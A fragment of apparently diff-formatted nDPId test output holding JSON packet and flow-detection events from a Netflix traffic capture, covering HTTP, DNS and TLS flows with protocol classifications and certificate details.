+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1484319064593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064593,"pkt":"gCqoTGHM5JjWH70UCABFAABAVrtAAEAG\/srAqAEHF\/YLjc\/AAFDz13keAAAAALAC\/\/\/FywAAAgQFtAEDAwUBAQgKH2UvkwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz8BQi7Oi89d5H6AS\/\/+uwwAAAgQFtAEDAwkEAggKYvDA2R9lL5M="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} 
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1484319064683,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1484319064683,"pkt":"gCqoTGHM5JjWH70UCABFAABFcJ0AAP8Rx7HAqAEHwKgBAe4iADUAMSObED0BAAABAAAAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAE="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1484319064699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1484319064699,"pkt":"5JjWH70UgCqoTGHMCABFAADq4UlAAEAR1WDAqAEBwKgBBwA17iIA1plWED2BgAABAAkAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAMABkHaWNobmFlYQdsYXRlbmN5BnByb2RhYcAYwDUAAQABAAAAFgAENCUk\/MA1AAEAAQAAABYABDQrZhTANQABAAEAAAAWAAQ0Iv+pwDUAAQABAAAAFgAENBhu0sA1AAEAAQAAABYABDQK7rvANQABAAEAAAAWAAQ2RB9SwDUAAQABAAAAFgAENCdXJMA1AAEAAQAAABYABDQobnM="} 
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} 
-00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319070636,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319070636,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1484319070636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319070636,"pkt":"gCqoTGHM5JjWH70UCABFAABAs25AAEAGoh\/AqAEHF\/YLhc\/aAFBx1HGxAAAAALAC\/\/84uwAAAgQFtAEDAwUBAQgKH2VGAgAAAAAEAgAA"} 